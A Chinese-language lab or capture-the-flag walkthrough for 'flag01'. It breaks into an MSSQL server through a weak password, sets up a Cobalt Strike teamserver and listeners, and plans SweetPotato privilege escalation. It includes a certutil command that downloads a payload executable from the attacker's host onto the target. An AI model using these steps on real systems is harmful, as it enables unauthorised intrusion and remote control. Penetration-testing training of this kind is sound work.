flag01
首先用fscan扫描,得到1443端口开放了mssql服务 且存在弱口令
使用mdut工具连接后,发现权限较低,思路是使用甜土豆提权,也要上传fscan扫描内网,所以先上线CS
这里介绍一下CobaltStrike
工具
cobaltstrike工具
工具分服务端和客户端
服务端只能在Linux系统下运行,所以上传到服务器使用就可以
关键文件是teamserver
使用命令:./teamserver [IP] [连接密码]
如下所示:
客户端连接图:
输入 [ip]
、[端口]
用户名随便、密码就是刚才设置的密码
连接好之后设置监听器
监听器的各类参数如下:
参数 | 释义 |
---|---|
name | 为监听器名字,可任意 |
payload | payload类型 |
HTTP Hosts | shell反弹的主机,也就是我们 CS 服务器的 IP |
HTTP Hosts(Stager) | Stager的马请求下载payload的地址 |
HTTP Port(C2) | C2监听的端口 |
Cobaltstrike 4.1 版本提供了 8 种监听器,
beacon_xx 系列为 Cobalt Strike 自身内置的监听器,即在目标主机执行相应的payload,获取 shell 到 CS 上,包括 dns、http、https、smb 四种方式的监听器;
foreign 系列为外部监听器,通常与 MSF 或者 Armitage 联动,例如获取 meterpreter 到 MSF上。
下面继续讲:
生成payload上传到靶机:使用windows下载命令
certutil -f -split -urlcache http://[ip]/1111.exe C:\Users\Public\1111.exe
下载好了运行即可
运行之后就可以看到主机上线了,然后进入文件浏览上传stoaway、fscan、sweetpotato